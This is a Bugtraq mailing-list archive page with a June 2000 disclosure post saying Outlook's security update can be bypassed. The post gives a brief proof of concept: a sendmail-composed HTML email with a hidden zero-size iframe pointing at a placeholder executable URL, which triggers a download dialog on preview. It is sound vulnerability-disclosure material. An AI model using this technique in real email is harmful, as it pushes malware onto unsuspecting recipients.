Bugtraq mailing list archives
Circumventing Outlook Security Update File Download Security With IFRAMEs
From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Fri, 9 Jun 2000 14:33:33 -0800
This is an update to my previous post on malicious URLs and Outlook. You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs. Example: % sendmail outlookuser () example com MIME-Version: 1.0 Content-Type: text/html Subject: Fake Attachment <html> <iframe src='http://download.example.com/badfile.exe' height=0 width=0> </html>"
.
This will display an IE 'open/download' dialog if the message is viewed in the preview pane or opened for reading. So Outlook with the patch is still vulnerable to worms, virii and trojans. IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages. Get your FREE, totally secure email address at http://www.hushmail.com.
Current thread:
- Re: Remote DoS attack in Real Networks Real Server (Strike #2) vulnerability Ryan Russell (Jun 01)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2) vulnerability Christopher Schulte (Jun 02)
- bind running as root in Mandrake 7.0 Nicolas MONNET (Jun 03)
- Re: bind running as root in Mandrake 7.0 Brock Sides (Jun 03)
- Re: bind running as root in Mandrake 7.0 White Vampire (Jun 03)
- Re: bind running as root in Mandrake 7.0 Andrew L . Davis (Jun 04)
- Re: bind running as root in Mandrake 7.0 Elias Levy (Jun 08)
- Circumventing Outlook Security Update File Download Security With IFRAMEs cassius () HUSHMAIL COM (Jun 09)
- Re: bind running as root in Mandrake 7.0 Nathan Neulinger (Jun 11)
- Remote DoS for Mercur 3.2 |[TDP]| (Jun 13)
- Vulnerability in Solaris ufsrestore Job de Haas (Jun 14)
- <Possible follow-ups>
- Re: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability Christopher Schulte (Jun 02)